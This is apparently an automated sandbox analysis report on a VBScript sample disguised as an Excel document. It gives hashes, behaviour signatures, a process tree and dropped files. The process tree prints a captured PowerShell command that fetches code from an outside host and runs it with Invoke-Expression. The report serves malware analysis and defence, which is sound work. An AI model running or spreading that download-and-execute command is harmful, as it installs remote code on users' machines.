Overview

overview

10

Static

static

1

EXCEL_DOCU...EN.vbs

windows7-x64

3

EXCEL_DOCU...EN.vbs

windows10-2004-x64

10

Resubmissions

12-08-2024 11:41

240812-ntgelazapr 8

08-05-2024 15:00

240508-sdtr7sab2w 8

05-04-2024 15:07

240405-shpdaafc3v 10

04-04-2024 20:19

240404-y3t26aaa37 10

Analysis

  • max time kernel
    119s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    05-04-2024 15:07

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    EXCEL_DOCUMENT_OPEN.vbs

  • Size

    23KB

  • MD5

    6925ed4c3665b27592c356b0bbd4948d

  • SHA1

    7429a3929f68c87af85266c5d304f3e26e11a8c0

  • SHA256

    5237e653da5478c91e1de3d51a9713753b4bc1b4c9be8e9136cd9d94e216ae77

  • SHA512

    333ffd943ea86e75822f6c59412fe12b77f95ddeffd1f0286606faab19b595b27b528457158cc6afe2dcb75455ce9e1fb012ddf171f895135fc90e9d249599b6

  • SSDEEP

    384:J0Y5Y65Go4F0yNWe037NwNAUihUN+0X2RyiUiK3xYUif3JNB6Bcy:hYFFFNWe037NwNAUiKNIRyiUiK3xYUi2

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\EXCEL_DOCUMENT_OPEN.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2904
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'irreceiver.com/lcyqeksm')
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2772
  • C:\Program Files (x86)\Windows Media Player\wmplayer.exe
    "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Play -Embedding
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2692
    • C:\Program Files (x86)\Windows Media Player\setup_wm.exe
      "C:\Program Files (x86)\Windows Media Player\setup_wm.exe" /RunOnce:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Play -Embedding
      2⤵
        PID:2672
    • C:\Program Files (x86)\Windows Media Player\wmplayer.exe
      "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Play -Embedding
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:1624
      • C:\Program Files (x86)\Windows Media Player\setup_wm.exe
        "C:\Program Files (x86)\Windows Media Player\setup_wm.exe" /RunOnce:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Play -Embedding
        2⤵
          PID:1584

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\tmp25903.WMC\allservices.xml
        Filesize

        546B

        MD5

        df03e65b8e082f24dab09c57bc9c6241

        SHA1

        6b0dacbf38744c9a381830e6a5dc4c71bd7cedbf

        SHA256

        155b9c588061c71832af329fafa5678835d9153b8fbb7592195ae953d0c455ba

        SHA512

        ef1cc8d27fbc5da5daab854c933d3914b84ee539d4d2f0126dc1a04a830c5599e39a923c80257653638b1b99b0073a7174cc164be5887181730883c752ba2f99

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\wmsetup.log
        Filesize

        2KB

        MD5

        661869025faa2b9bfb668b7572f0dbc9

        SHA1

        be663b67dd43fcf3de0c80690003167d11143e10

        SHA256

        f63ed34fbbb436f144e2a8303351ea5e86d888958d65703ca4e29435d41b6475

        SHA512

        8c75e53bf5d7dbca5361bac5f4fdb58086c7dc7b381d2acc7f8fe933527d06d5502890623b2f6eff8058946b017b9e21f3906a931ceddb5b742d1e8dbace1b5a

        Download Submit

      • memory/2772-4-0x000000001B290000-0x000000001B572000-memory.dmp

        Filesize

        2.9MB

        Download

      • memory/2772-5-0x0000000002310000-0x0000000002318000-memory.dmp

        Filesize

        32KB

        Download

      • memory/2772-6-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/2772-7-0x0000000002900000-0x0000000002980000-memory.dmp

        Filesize

        512KB

        Download

      • memory/2772-8-0x0000000002900000-0x0000000002980000-memory.dmp

        Filesize

        512KB

        Download

      • memory/2772-9-0x0000000002900000-0x0000000002980000-memory.dmp

        Filesize

        512KB

        Download

      • memory/2772-10-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/2772-11-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

        Filesize

        9.6MB

        Download